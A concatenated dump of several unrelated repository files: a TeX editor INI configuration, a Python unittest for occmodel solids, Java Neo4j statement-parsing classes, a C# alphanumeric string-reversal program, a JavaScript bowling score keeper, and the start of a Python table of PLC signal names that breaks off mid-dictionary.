Preview\Auto%20Preview%20Delay=300
Geometries\PdfViewerLeft=453
Geometries\PdfViewerTop=256
Geometries\PdfViewerWidth=453
Geometries\PdfViewerHeight=256
Geometries\PdfViewerState=@ByteArray()
Preview\DPI=99
Preview\Scale%20Option=1
Preview\Scale=100
Preview\Magnifier%20Size=300
Preview\Magnifier%20Shape=1
Preview\Magnifier%20Border=false
Preview\Sync%20File%20Mask=*.tex
Tools\User%20Class=@Invalid()
Tools\User%20Paper=@Invalid()
Tools\User%20Encoding=@Invalid()
Tools\User%20Options=@Invalid()
Quick\Class=article
Quick\Typeface=10pt
Quick\Papersize=a4paper
Quick\Encoding=latin1
Quick\AMS=true
Quick\MakeIndex=false
Quick\Author=
Quick\Geometry%20Page%20Width=0
Quick\Geometry%20Page%20Height=0
Quick\Geometry%20Margin%20Left=0
Quick\Geometry%20Margin%20Right=0
Quick\Geometry%20Margin%20Top=0
Quick\Geometry%20Margin%20Bottom=0
Quick\Geometry%20Page%20Width%20Unit=cm
Quick\Geometry%20Page%20Height%20Unit=cm
Quick\Geometry%20Margin%20Left%20Unit=cm
Quick\Geometry%20Margin%20Right%20Unit=cm
Quick\Geometry%20Margin%20Top%20Unit=cm
Quick\Geometry%20Margin%20Bottom%20Unit=cm
Quick\Geometry%20Page%20Width%20Enabled=false
Quick\Geometry%20Page%20Height%20Enabled=false
Quick\Geometry%20Margin%20Left%20Enabled=false
Quick\Geometry%20Margin%20Right%20Enabled=false
Quick\Geometry%20Margin%20Top%20Enabled=false
Quick\Geometry%20Margin%20Bottom%20Enabled=false
Tools\Latex="S:\\texmf\\miktex\\bin\\xelatex -no-pdf -interaction=nonstopmode %.tex"
Tools\Dvips=S:\\texmf\\miktex\\bin\\xdvipdfmx -vv -E %.xdv
Tools\Ps2pdf=ps2pdf %.ps
Tools\Makeindex=makeindex %.idx
Tools\Bibtex=bibtex %
Tools\Pdflatex="pdflatex -synctex=1 -interaction=nonstopmode %.tex"
Tools\Dvipdf=dvipdf %.dvi
Tools\Dvipng=dvipng -T tight -D 120 %.dvi
Tools\Metapost="mpost -interaction=nonstopmode ?me)"
Tools\Dvi=" %.dvi"
Tools\Ps=C:\\WINDOWS\\system32\\notepad.exe \"?am.ps\"
Tools\Pdf=tmx://internal-pdf-viewer/S:\\FoxitReader\\FoxitReader.exe %.pdf
Tools\Ghostscript=\"C:\\Program Files\\gs\\gs9.02\\bin\\gswin32c.exe\"
Tools\Asy=asy ?m*.asy
Tools\Userquick="S:\\texmf\\miktex\\bin\\xelatex -no-pdf -interaction=nonstopmode %.tex|S:\\texmf\\miktex\\bin\\xdvipdfmx -vv -E %.xdv|S:\\FoxitReader\\FoxitReader.exe %.pdf"
Tools\Precompile=
Tools\SVN="svn "
Tools\SVNADMIN="svnadmin "
Tools\Quick%20Mode=8
Tools\Dvi2Png%20Mode=0
Files\Save%20Files%20Before%20Compiling=2
Preview\Remove%20Beamer%20Class=true
Preview\Precompile%20Preamble=true
Files\Default%20File%20Filter=TeX files (*.tex *.bib *.sty *.cls *.mp)
User\Templates=@Invalid()
Search\Find%20History=@Invalid()
Search\Case%20Sensitive=true
Search\Whole%20Words=false
Search\Regular%20Expression=false
Search\Highlight=true
Search\Cursor=true
Search\Selection=false
Search\Ask%20before%20Replace=false
Search\Escape%20Sequence=false
Search\Replace%20History=@Invalid()
Editor\Completion%20Files=latex-document.cwl, latex-mathsymbols.cwl, tex.cwl, texmakerx.cwl
qttwp\userwidth=700
qttwp\compil=1
qttwp\tocdepth=2
qttwp\startindex=1
qttwp\navigation=1
qttwp\noindex=false
qttwp\title=
qttwp\address=
qttwp\browser=\"C:/Program Files/Internet Explorer/IEXPLORE.EXE\"
qttwp\contentname=\\contentsname
qttwp\align=center
qttwp\lastdir=C:/Documents and Settings/amd
qttwp\dviopt=" -Ppk -V"
InsertGraphics\includeOptions="width=\\textwidth"
InsertGraphics\center=true
InsertGraphics\useFigure=true
InsertGraphics\captionBelow=true
InsertGraphics\placement=htbp
InsertGraphics\spanTwoCols=false
Tools\After%20BibTeX%20Change=tmx://latex && tmx://bibtex && tmx://latex
User\New%20Key%20Replacements%20Created=true
User\Tags=%%, " %%"
User\TagNames=Key replacement: % before word, Key replacement: % after word
User\TagAbbrevs=,
User\TagTriggers="(?<=\\s|^)%", "(?<=\\S)%"
keysetting\size=0
changedLatexMenus=@Variant(\0\0\0\b\0\0\0\0)
CustomToolBar=@Invalid()
FileToolBar=@Invalid()
EditToolBar=@Invalid()
ToolsToolBar=@Invalid()
MathToolBar=@Invalid()
FormatToolBar=@Invalid()
TableToolBar=@Invalid()
DiffToolBar=@Invalid()
CentralToolBar=@Invalid()
customIcons=@Variant(\0\0\0\b\0\0\0\0)
customHighlighting=@Variant(\0\0\0\b\0\0\0\0)
customCommands=@Invalid()
MainWindowState=@ByteArray(\0\0\0\xff\0\0\0\0\xfd\0\0\0\x2\0\0\0\0\0\0\x1\x1b\0\0\x2G\xfc\x2\0\0\0\x1\xfb\0\0\0\x12\0l\0\x65\0\x66\0t\0P\0\x61\0n\0\x65\0l\x1\0\0\0\x36\0\0\x2G\0\0\0g\0\xff\xff\xff\0\0\0\x3\0\0\x3\xcc\0\0\0\xd7\xfc\x1\0\0\0\x1\xfb\0\0\0\x14\0O\0u\0t\0p\0u\0t\0V\0i\0\x65\0w\x1\0\0\x1 \0\0\x3\xcc\0\0\0\x81\0\xff\xff\xff\0\0\x3\xcc\0\0\x1k\0\0\0\x1\0\0\0\x2\0\0\0\x1\0\0\0\x2\xfc\0\0\0\x1\0\0\0\x2\0\0\0\b\0\0\0\f\0\x43\0u\0s\0t\0o\0m\0\0\0\0\0\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\b\0\x46\0i\0l\0\x65\x1\0\0\0\0\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\b\0\x45\0\x64\0i\0t\x1\0\0\0\x82\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\n\0T\0o\0o\0l\0s\x1\0\0\x1!\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\b\0M\0\x61\0t\0h\x1\0\0\x2X\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\f\0\x46\0o\0r\0m\0\x61\0t\x1\0\0\x3\xb0\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\n\0T\0\x61\0\x62\0l\0\x65\x1\0\0\x4x\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\b\0\x44\0i\0\x66\0\x66\x1\0\0\x4\xb2\xff\xff\xff\xff\0\0\0\0\0\0\0\0)
MainWindowFullssscreenState=@ByteArray()
MainWindow\Maximized=false
MainWindow\FullScreen=false
Geometries\MainwindowWidth=1260
Geometries\MainwindowHeight=668
Geometries\MainwindowX=11
Geometries\MainwindowY=48
Symbols\Quantity=@Variant(\0\0\0\b\0\0\0\0)
Symbols\Favorite%20IDs=@Invalid()
Symbols\hiddenlists=
StructureView\SingleDocMode=false
Editor%20Key%20Mapping\0=20483
Files\Session\CurrentFile=S:/examples/simple.tex
Files\Last%20Document=S:/examples/simple.tex
Files\Recent%20Files=S:/examples/simple.tex, D:/LyTeX2/MyDoc/python_intro/yen_python_intro.tex
[formats]
version=1.0
<file_sep>import sys
import unittest
from math import pi, sin, cos, sqrt
from occmodel import *
class test_Solid(unittest.TestCase):
    """Unit tests for the occmodel ``Solid`` primitives.

    NOTE(review): the original file defined ``test_createTorus`` twice; the
    second definition shadowed the first, so the torus checks never ran.  The
    second copy actually exercises ``createCone`` and is renamed
    ``test_createCone`` below so both tests are collected.
    """

    def almostEqual(self, a, b, places = 7):
        """Element-wise assertAlmostEqual over two equal-length sequences."""
        for va, vb in zip(a, b):
            self.assertAlmostEqual(va, vb, places)

    def test_centreOfMass(self):
        eq = self.almostEqual
        solid = Solid()
        solid.createSphere((0.,0.,0.),1.)
        eq(solid.centreOfMass(), (0.,0.,0.))

    def test_translate(self):
        eq = self.almostEqual
        solid = Solid()
        solid.createSphere((0.,0.,0.),1.)
        solid.translate((1.,2.,3.))
        eq(solid.centreOfMass(), (1.,2.,3.))

    def test_rotate(self):
        eq = self.almostEqual
        solid = Solid()
        solid.createSphere((0.,0.,0.),1.)
        # Quarter turn about the Y-direction axis through (1,1,0).
        solid.rotate(-pi/2., (0.,1.,0.),(1.,1.,0.))
        eq(solid.centreOfMass(), (1.,0.,-1.))

    def test_scale(self):
        eq = self.assertAlmostEqual
        scale = .5
        solid = Solid()
        solid.createSphere((0.,0.,0.),1.)
        solid.scale((0.,0.,0.), scale)
        # NOTE(review): the disabled expectations below look unfinished —
        # area scales with scale**2 and volume with scale**3; left as found.
        #eq(solid.area(), scale*4.*pi, places = 3)
        #eq(solid.volume(), scale*4./3.*pi, places = 3)

    def test_addSolids(self):
        eq = self.assertAlmostEqual
        # Bulk form: add a sequence of solids at once.
        s1 = Solid().createSphere((0.,0.,0.),1.)
        s2 = Solid().createSphere((2.,0.,0.),1.)
        s3 = Solid().addSolids((s1,s2))
        self.assertEqual(s3.numSolids(), 2)
        eq(s3.area(), 2.*4.*pi, places = 3)
        eq(s3.volume(), 2.*4./3.*pi, places = 3)
        # Incremental form: add one solid at a time.
        s1 = Solid().createSphere((0.,0.,0.),.5)
        self.assertEqual(s1.numSolids(), 1)
        s2 = Solid().createSphere((2.,0.,0.),.5)
        s1.addSolids(s2)
        self.assertEqual(s1.numSolids(), 2)
        s3 = Solid().createSphere((4.,0.,0.),.5)
        s1.addSolids(s3)
        self.assertEqual(s1.numSolids(), 3)

    def test_createSphere(self):
        eq = self.assertAlmostEqual
        # Zero or negative radius must be rejected.
        self.assertRaises(OCCError, Solid().createSphere, (0.,0.,0.),0.)
        self.assertRaises(OCCError, Solid().createSphere, (0.,0.,0.),-1.)
        solid = Solid()
        solid.createSphere((0.,0.,0.),1.)
        eq(solid.area(), 4.*pi, places = 3)
        eq(solid.volume(), 4./3.*pi, places = 3)

    def test_createCylinder(self):
        eq = self.assertAlmostEqual
        self.assertRaises(OCCError, Solid().createCylinder, (0.,0.,0.),(0.,0.,1.), 0.)
        self.assertRaises(OCCError, Solid().createCylinder, (0.,0.,0.),(0.,0.,1.), -1.)
        solid = Solid()
        solid.createCylinder((0.,0.,0.),(0.,0.,1.), 1.)
        eq(solid.area(), 4.*pi, places = 3)
        eq(solid.volume(), pi, places = 3)

    def test_createTorus(self):
        eq = self.assertAlmostEqual
        self.assertRaises(OCCError, Solid().createTorus, (0.,0.,0.),(0.,0.,.1), 0., 1.)
        self.assertRaises(OCCError, Solid().createTorus, (0.,0.,0.),(0.,0.,.1), 1., 0.)
        solid = Solid()
        solid.createTorus((0.,0.,0.),(0.,0.,.1), 2., 1.)
        # Torus: area = 4*pi^2*R*r, volume = 2*pi^2*R*r^2.
        eq(solid.area(), 4.*pi**2*2.*1., places = 1)
        eq(solid.volume(), 2.*pi**2*2.*1.**2, places = 3)

    def test_createCone(self):
        # BUG FIX: this was a second ``test_createTorus`` definition that
        # shadowed the real torus test above; renamed so both run.
        self.assertRaises(OCCError, Solid().createCone, (0.,0.,0.),(0.,0.,1.), 0., 0.)
        self.assertRaises(OCCError, Solid().createCone, (0.,0.,0.),(0.,0.,1.), 1., 1.)
        solid = Solid()
        solid.createCone((0.,0.,0.),(0.,0.,.1), 2., 1.)
        self.assertEqual(solid.volume() > 0., True)

    def test_createBox(self):
        eq = self.assertAlmostEqual
        # Degenerate box (identical corners) must be rejected.
        self.assertRaises(OCCError, Solid().createBox, (-.5,-.5,-.5),(-.5,-.5,-.5))
        solid = Solid()
        solid.createBox((-.5,-.5,-.5),(.5,.5,.5))
        eq(solid.volume(), 1.)
if __name__ == "__main__":
    # Keep Python from writing .pyc files for anything imported after this
    # point when the test module is executed directly.
    sys.dont_write_bytecode = True
unittest.main() | ea1ab50f8572cf5b964183311ca126f798c3d115 | [
"JavaScript",
"Markdown",
"INI",
"Python",
"PHP",
"Shell"
] | 32 | Python | 90umut/extensions | 5086b8a7a65cb170096336f2f680274a7ab194df | bb99637d1bf90b82bc32af4c53d18e4176f50ef0 |
refs/heads/master | <file_sep>package main;
import java.io.File;
import java.io.FileNotFoundException;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
import static java.lang.System.out;
public class JParser {

    private String term1;
    private String relation;
    private String term2;
    private int num_lines;
    private List<Statement> list;
    private Scanner scan;

    /**
     * Opens the given file and immediately parses every whitespace-separated
     * "term1 relation term2" triple into {@link Statement} objects.
     *
     * @param file input file containing one statement per line
     * @throws FileNotFoundException if the file cannot be opened.
     *         BUG FIX: the original caught this exception and only printed it,
     *         which left {@code scan} null and caused a NullPointerException
     *         on first use; it now propagates as declared.
     */
    public JParser(File file) throws FileNotFoundException {
        list = new ArrayList<Statement>();
        scan = new Scanner(file);
        makeStatements();
    }

    /** @return the number of statements parsed so far. */
    public int getLineNumbers() {
        return num_lines;
    }

    /**
     * Consumes the scanner, building one {@link Statement} per triple and
     * echoing each parsed triple to stdout. Stops at end of input, then
     * releases the underlying file handle.
     */
    public void makeStatements() {
        while (scan.hasNextLine()) {
            if (!scan.hasNext())
                break;
            term1 = scan.next();
            relation = scan.next();
            term2 = scan.next();
            list.add(new Statement(term1, term2, relation));
            out.println("\nterm1:" + term1 + " term2:" + term2 + " relationship:" + relation);
            num_lines++;
        }
        // All input consumed; close the scanner so the file handle is freed
        // (the original never closed it).
        scan.close();
    }

    /** @return all parsed statements, in input order. */
    public List<Statement> getStatements() {
        return list;
    }
}
<file_sep>package main;
public class JBEL {
    // Placeholder model class; currently only carries a name.
    // NOTE(review): package-private field with no accessors — presumably an
    // early stub for a BEL document model; confirm before extending.
    String name;
}
<file_sep>package main;
import org.neo4j.graphdb.RelationshipType;
import main.GraphDBasic.RelTypes;
public class Statement {

    // Subject and object of the relation; the relation name itself is kept
    // as the raw token read from the input file.
    private String term1;
    private String term2;
    String r;

    /**
     * @param t1 first term (subject)
     * @param t2 second term (object)
     * @param r  relation token, e.g. "INCREASES"
     */
    public Statement(String t1, String t2, String r) {
        this.term1 = t1;
        this.term2 = t2;
        this.r = r;
    }

    /** @return the first (subject) term. */
    public String getFirstTerm() {
        return term1;
    }

    /** @return the second (object) term. */
    public String getSecondTerm() {
        return term2;
    }

    /**
     * Maps the raw relation token to the graph relationship type;
     * unknown tokens yield null (a null token throws NPE, as before).
     */
    public RelationshipType getRelationshipType() {
        switch (r) {
            case "INCREASES":
                return RelTypes.INCREASES;
            case "DECREASES":
                return RelTypes.DECREASES;
            case "EATS":
                return RelTypes.EATS;
            case "HATES":
                return RelTypes.HATES;
            case "LOVES":
                return RelTypes.LOVES;
            default:
                return null;
        }
    }

    /** @return the statement rendered as "term1 relation term2". */
    public String toString() {
        return String.format("%s %s %s", term1, r, term2);
    }
}
<file_sep>package main;
import org.neo4j.graphdb.Direction;
import org.neo4j.graphdb.GraphDatabaseService;
import org.neo4j.graphdb.Node;
import org.neo4j.graphdb.Relationship;
import org.neo4j.graphdb.RelationshipType;
import org.neo4j.graphdb.Transaction;
import org.neo4j.graphdb.factory.GraphDatabaseFactory;
import org.neo4j.graphdb.index.Index;
import org.neo4j.kernel.EmbeddedGraphDatabase;
import static java.lang.System.out;
@SuppressWarnings("unused")
// Skeleton of the classic Neo4j "users by name" index example.
// NOTE(review): graphDb and nodeIndex are never initialized anywhere in this
// class — calling createAndIndexUser before wiring them up will NPE; confirm
// where they were meant to be assigned.
public class UserLookups {
    private static GraphDatabaseService graphDb;
    private static final String USERNAME_KEY = "username";
    private static Index<Node> nodeIndex;
    // Relationship types of the user index subgraph.
    private static enum RelTypes implements RelationshipType{
        USERS_REF,
        USER
    }
    // Builds a synthetic username for a numeric id.
    // NOTE(review): "@sel<EMAIL>.org" looks like an anonymization artifact of
    // the original domain string — restore the real domain before use.
    private static String idToUserName(final int id){
        return "user" + id + "@sel<EMAIL>.org";
    }
    // Creates a node carrying the username property and indexes it by name.
    private static Node createAndIndexUser( final String username )
    {
        Node node = graphDb.createNode();
        node.setProperty( USERNAME_KEY, username );
        nodeIndex.add( node, USERNAME_KEY, username );
        return node;
    }
    private static void registerShutdownHook( final GraphDatabaseService graphDb )
    {
        // Registers a shutdown hook for the Neo4j instance so that it
        // shuts down nicely when the VM exits (even if you "Ctrl-C" the
        // running example before it's completed)
        Runtime.getRuntime().addShutdownHook( new Thread()
        {
            @Override
            public void run()
            {
                graphDb.shutdown();
            }
        } );
    }
    // NOTE(review): opens an embedded database but never assigns it to
    // graphDb, never registers the shutdown hook, and never shuts it down —
    // clearly unfinished (see the commented assignment).
    public static void main(String[] args){
        GraphDatabaseService gdbs = new GraphDatabaseFactory().newEmbeddedDatabase("var/db_tmp");
        //nodeIndex = gdbs.
    }
}
<file_sep>GraphDBing
==========
Graph Database experimenting | a7a0d89baedeebcf4209a897cc0f222cb9ec578b | [
"Markdown",
"Java"
] | 5 | Java | jhourani/GraphDBing | b9800bcbc9c671a976fdfb6d83128f568f7dbf6b | 47a7b4eef5fe49c46eadfd6495fa0fd09c75ae3a |
refs/heads/master | <repo_name>LostInTexas/FILO<file_sep>/FILO.Domain/ISortMultiple.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace FILO.Domain
{
    /// <summary>
    /// Strategy interface for the multi-pass ("pin the separators, then
    /// refill from the far end") string reversal implemented by <c>Sort</c>.
    /// </summary>
    public interface ISortMultiple
    {
        /// <summary>
        /// Returns <paramref name="value"/> with its alphanumeric characters
        /// reversed while every non-alphanumeric character keeps its original
        /// position; implementations return null on failure.
        /// </summary>
        string SortString(string value);
    }
}
<file_sep>/FILO.Domain/Sort.cs
using System;
using System.Collections.Generic;
namespace FILO.Domain
{
public class Sort: ISortMultiple, ISortSingle
{
    /// <summary>
    /// Reverses the alphanumeric characters of <paramref name="value"/> while
    /// every non-alphanumeric character keeps its position.  Two passes:
    /// first the separators are pinned in place as anchors, then the
    /// alphanumerics are poured back in from the far end.
    /// Returns null on any failure (errors are swallowed by design here;
    /// the original contract is preserved).
    /// </summary>
    string ISortMultiple.SortString(string value)
    {
        try
        {
            char[] source = value.ToCharArray();
            char[] result = new char[value.Length];
            Array.Clear(result, 0, result.Length);

            // Pass 1: separators stay exactly where they were.
            for (int i = 0; i < source.Length; i++)
            {
                if (!char.IsLetterOrDigit(source[i]))
                {
                    result[i] = source[i];
                }
            }

            // Pass 2: walk the alphanumerics in order and drop each one into
            // the right-most slot that is still empty ('\0').
            int slot = value.Length - 1;
            for (int i = 0; i < source.Length; i++)
            {
                char current = source[i];
                if (!char.IsLetterOrDigit(current))
                {
                    continue;
                }
                while (result[slot] != 0 && slot >= 0)
                {
                    slot--;
                }
                result[slot] = current;
                slot--;
            }
            return new string(result);
        }
        catch (Exception)
        {
            // Swallowed by design in the original implementation; the caller
            // receives null on any failure.
        }
        return null;
    }

    /// <summary>
    /// Same reversal done in a single sweep: two indices close in on each
    /// other, stepping over separators and swapping alphanumerics.
    /// Returns null on any failure, matching the original behaviour.
    /// </summary>
    string ISortSingle.SortString(string value)
    {
        try
        {
            char[] buffer = value.ToCharArray();
            int left = 0;
            int right = buffer.Length - 1;
            while (left < right)
            {
                if (!char.IsLetterOrDigit(buffer[left]))
                {
                    left++;
                }
                else if (!char.IsLetterOrDigit(buffer[right]))
                {
                    right--;
                }
                else
                {
                    char tmp = buffer[left];
                    buffer[left] = buffer[right];
                    buffer[right] = tmp;
                    left++;
                    right--;
                }
            }
            return new string(buffer);
        }
        catch (Exception)
        {
            // Swallowed by design; see the multi-pass variant above.
        }
        return null;
    }
}
}
<file_sep>/FILOApp/FILOApp/Program.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using FILO.Domain;
using Newtonsoft.Json;
namespace FILOApp
{
class Program
{
    /// <summary>
    /// Reads "file.txt" from the working directory and, for every line,
    /// prints the original string followed by the result of both reversal
    /// strategies (single-pass and multi-pass) for comparison.
    /// </summary>
    static void Main(string[] args)
    {
        try
        {
            // One Sort instance implements both strategy interfaces; two
            // references are kept so each call site names its strategy.
            // (Removed the never-used locals `string json;` and
            // `List<Data> items;` from the original.)
            ISortSingle sortSingle = new Sort();
            ISortMultiple sortMultiple = new Sort();
            string[] lines = System.IO.File.ReadAllLines(@"file.txt");
            foreach (string s in lines)
            {
                Console.WriteLine(string.Concat("Original string: ", s));
                Console.WriteLine(string.Concat("Method 1: ", sortSingle.SortString(s)));
                Console.WriteLine(string.Concat("Method 2: ", sortMultiple.SortString(s)));
            }
        }
        catch (Exception e)
        {
            Console.WriteLine("An error occured: ");
            Console.WriteLine(e.Message);
        }
        finally
        {
            // Keep the console window open until the user confirms.
            Console.WriteLine("Press enter");
            Console.ReadLine();
        }
    }
}
}
| 386b5a609046876861532dd818c630704fc5bc0f | [
"C#"
] | 3 | C# | LostInTexas/FILO | 8a268589f0b8f1ff838fc3c4b6defbddd8e9f219 | c46ef90677dc3dcd09fdfb41058ec16b7923d274 |
refs/heads/master | <file_sep>Ten Pin Bowling Score Keeper build for BBC Technical Assessment.
Created by <NAME>
Can be viewed live here: http://users.aber.ac.uk/swt3/bowling
<file_sep>
// One ten-pin bowling player: holds the player's name and the rolls of up to
// ten frames.  Each frame is an array of per-roll pin counts (one or two
// rolls in frames 1-9, up to three in frame 10).
function Player(name) {
	this.name = name;
	this.frames = [];
}

// Records one roll.  Returns true when the roll is accepted, false when the
// game is already over or the pin count is impossible for the current frame.
Player.prototype.addScore = function(score) {
	if(this.isGameOver())
		return false;
	var frame = this.frames[this.frames.length - 1];
	// Open a new frame when the previous one is complete.
	if(this.isFrameOver()) {
		frame = [];
		this.frames.push(frame);
	}
	// Frames 1-9: the rolls of a frame may not exceed 10 pins in total.
	// Frame 10: bonus rolls are allowed after a strike (first roll 10) or a
	// spare (first two rolls sum to 10); a normal pair still caps at 10.
	if((this.frames.length < 10 && (frame[0] || 0) + score <= 10) ||
		(this.frames.length == 10 && (frame[0] == 10 || (frame[0] || 0) + score <= 10 || frame[0] + frame[1] == 10))) {
		frame.push(score);
		return true;
	} else {
		return false;
	}
}

// Returns the internal frames array (not a copy).
Player.prototype.getFrames = function() {
	return this.frames;
}

// Returns every roll of the game as one flat array.
Player.prototype.getRolls = function() {
	var rolls = [];
	rolls = rolls.concat.apply(rolls, this.frames);
	return rolls;
}

// Computes the current total score, including strike and spare bonuses.
Player.prototype.getScore = function() {
	var score = 0;
	var frames = this.getFrames();
	for(var i = 0; i < frames.length; i++) {
		var frame = frames[i];
		for(var j = 0; j < frame.length; j++) {
			// Pins knocked down by this roll.
			score += frame[j];
			if(i < 9 && j == 0 && frame[j] == 10 && frames[i + 1]) {
				// Strike in frames 1-9: the bonus is the next two rolls.
				// BUG FIX: the old code used `frames[i+1][1] || frames[i+2][0]`,
				// so a gutter ball (0) as the second roll of the next frame
				// was treated as "missing" and the bonus was wrongly taken
				// from the frame after it.  Use explicit length checks.
				var next = frames[i + 1];
				score += next.length > 0 ? next[0] : 0;
				if(next.length > 1) {
					score += next[1];
				} else if(frames[i + 2] && frames[i + 2].length > 0) {
					// The next frame was itself a strike, so the second
					// bonus roll comes from the frame after it.
					score += frames[i + 2][0];
				}
			} else if(j == 1 && (frame[0] + frame[1]) == 10 && frames[i + 1]) {
				// Spare: the bonus is the next roll.
				score += frames[i + 1][0] || 0;
			}
		}
	}
	return score;
}

// Shows the given message in the page's #error box (DOM-dependent; only
// usable in a browser context).
Player.prototype.showError = function(errorMessage) {
	var error = document.querySelector('#error');
	error.innerHTML = errorMessage;
	error.style.visibility = 'initial';
}

// Number of rolls already taken in the current frame (0 before any roll).
Player.prototype.getRollInFrame = function() {
	return this.frames[0] ? this.frames[this.frames.length - 1].length : 0;
}

// A frame is complete after two rolls (or one strike) in frames 1-9; in
// frame 10 after three rolls, or after two rolls that are neither a strike
// nor a spare.  An absent frame counts as "over" so addScore opens a new one.
Player.prototype.isFrameOver = function() {
	var frame = this.frames[this.frames.length - 1];
	return !frame || (this.frames.length < 10 && (frame.length == 2 || frame[0] == 10)) || (this.frames.length == 10 && (frame.length == 3 || frame[0] + frame[1] < 10));
}

// The game ends when the tenth frame is complete.
Player.prototype.isGameOver = function() {
	return this.frames.length == 10 && this.isFrameOver();
}
| b821f58309304a1fe6e6d9e5f7aa31a262719ccb | [
"Markdown",
"JavaScript"
] | 2 | Markdown | stuartthomas/Ten-Pin-Bowling2 | c999baa71457e69dc8f0a0fc057f46d136c05f79 | 9c8f85c3db036d0fd5699b363111706cbdf3934e |
refs/heads/master | <file_sep>import pandas as pd
import os
import glob
from datetime import datetime
from GeneratePLCcode import importdf
KISes = [
"КИС320.1",
"КИС336.1",
"КИС336.2",
"КИС336.3",
"КИС420.1",
"КИС420.2",
"КИС420.3",
"КИС420.4",
"КИС420.5",
"КИС420.6",
"КИС420.7"]
object_types = [
"Клапан",
"Электронагреватель",
"AI",
"AI_Sign",
"Электрофорезный фильтр",
"Фильтр рулонный",
"КИД",
"МЕО1",
"Сигнализатор",
"Вентилятор",
"Избиратель",
"Контактный аппарат",
"Мешалка",
"Насос",
"Шибер"]
# Mapping: object type -> list of block-input signal names expected for that
# type by the PLC code generation.  Keys mix Russian type names and short
# Latin aliases; several keys carry a " ??" suffix (presumably garbled /
# uncertain type labels inherited from the master base — confirm upstream).
foo_switcher = {
    "Клапан": [
        "OP",
        "CL",
        "Local",
        "Remoute",
        "Power_En",
        "CMD_OP_GCHU",
        "CMD_CL_GCHU",
        "CMD_STP_GCHU",
        "CMD_OP_RCHU",
        "CMD_CL_RCHU",
        "CMD_STP_RCHU",
        "Auto_mode",
        "Man_mode"],
    'el_nagr': [
        "Run",
        "Cmd_Strt_Local",
        "Cmd_Strt_Rchu"],
    "AI": ["In"],
    "AI_complicate": [
        "Limit4_H",
        "Limit9_L_PS2",
        "Limit10_LL_PS2_Dis",
        "Limit7_L_Dis",
        "Limit8_LL_Dis",
        "Limit4_H_Dis",
        "Limit8_LL",
        "Limit10_LL_PS2",
        "Limit7_L",
        "Limit9_L_PS2_Dis",
        "Limit1_HH_PS2",
        "Limit1_HH_PS2_Dis",
        "Limit3_HH",
        "Limit3_HH_Dis",
        "Limit3_HH_Cmd",
        "Limit8_LL_Cmd",
        "Limit10_LL_PS2_Cmd",
        "Limit4_H_Cmd",
        "Limit1_HH_PS2_Cmd",
        "Limit7_L_Cmd",
        "Limit9_L_PS2_Cmd",
        "Power_En",
        "Limit2_H_PS2",
        "Limit2_H_PS2_Cmd",
        "Limit2_HH_PS2_Dis",
        "In"],
    "Сигн AI": [
        "Limit3_HH_Cmd",
        "Limit4_H_Cmd",
        "Limit7_L",
        "Limit4_H",
        "Limit4_H_Dis",
        "Limit3_HH_Dis",
        "Limit3_HH",
        "Limit7_L_Dis",
        "Limit8_LL_Dis",
        "Limit8_LL",
        "Limit7_L_Cmd",
        "Limit8_LL_Cmd",
        "Limit9_L_PS2_Cmd",
        "Limit6_Ln",
        "Limit6_Ln_Dis",
        "Limit6_Ln_Cmd",
        "Limit5_Hn",
        "Power_En",
        "Limit2_HH_PS2_Dis",
        "Limit2_H_PS2",
        "Limit2_H_PS2_Cmd",
        "Limit10_LL_PS2_Cmd",
        "Limit5_Hn_Cmd",
        "Limit9_L_PS2",
        "Limit10_LL_PS2",
        "Limit9_L_PS2_Dis",
        "Limit10_LL_PS2_Dis",
        "In"],
    # BUG FIX: "Limit10_LL_PS2_Dis" was missing its trailing comma, so Python
    # silently concatenated it with the following "In" into one bogus entry
    # "Limit10_LL_PS2_DisIn", losing both real signal names.
    "Сигн AI ??": [
        "Limit3_HH_Cmd",
        "Limit4_H_Cmd",
        "Limit7_L",
        "Limit4_H",
        "Limit4_H_Dis",
        "Limit3_HH_Dis",
        "Limit3_HH",
        "Limit7_L_Dis",
        "Limit8_LL_Dis",
        "Limit8_LL",
        "Limit7_L_Cmd",
        "Limit8_LL_Cmd",
        "Limit9_L_PS2_Cmd",
        "Limit6_Ln",
        "Limit6_Ln_Dis",
        "Limit6_Ln_Cmd",
        "Limit5_Hn",
        "Power_En",
        "Limit2_HH_PS2_Dis",
        "Limit2_H_PS2",
        "Limit2_H_PS2_Cmd",
        "Limit10_LL_PS2_Cmd",
        "Limit5_Hn_Cmd",
        "Limit9_L_PS2",
        "Limit10_LL_PS2",
        "Limit9_L_PS2_Dis",
        "Limit10_LL_PS2_Dis",
        "In"],
    "Elektroforez": [
        "Limit7_L",
        "Limit8_LL",
        "On_Perepolus",
        "On_Rabota"],
    "flt_rulon": [
        "Run",
        "Remoute",
        "Local",
        "Cmd_Strt_Gchu",
        "Cmd_Strt_Local"],
    'kid': [
        "Cmd_Cl_Gchu",
        "Cmd_Op_Gchu",
        "Power_En_Rchu",
        "CL",
        "OP",
        "Remoute",
        "Power_En_Cho"],
    'meo_1': [
        "na_back",
        "na_forw"],
    'NO': [],
    "Signalizator": ["Sign"],
    "вентилятор": [
        "Cmd_Strt_Rchu",
        "Man_Mode",
        "Run",
        "Local",
        "Remoute",
        "Pozar_Run",
        "Avaria_Stp",
        "Stp",
        "Auto_Mode",
        "Auto_Main_On",
        "No_Power_En",
        "Cmd_Strt_Local",
        "Klapan_Cl",
        "Avaria_Off",
        "Klapan_Op",
        "Auto_Back_On",
        "Remoute_On"],
    "вентилятор ??": [
        "Cmd_Strt_Rchu",
        "Man_Mode",
        "Run",
        "Local",
        "Remoute",
        "Pozar_Run",
        "Avaria_Stp",
        "Stp",
        "Auto_Mode",
        "Auto_Main_On",
        "No_Power_En",
        "Cmd_Strt_Local",
        "Klapan_Cl",
        "Avaria_Off",
        "Klapan_Op",
        "Auto_Back_On",
        "Remoute_On"],
    "избиратель": [
        "Manual_mode",
        "Auto_Mode"],
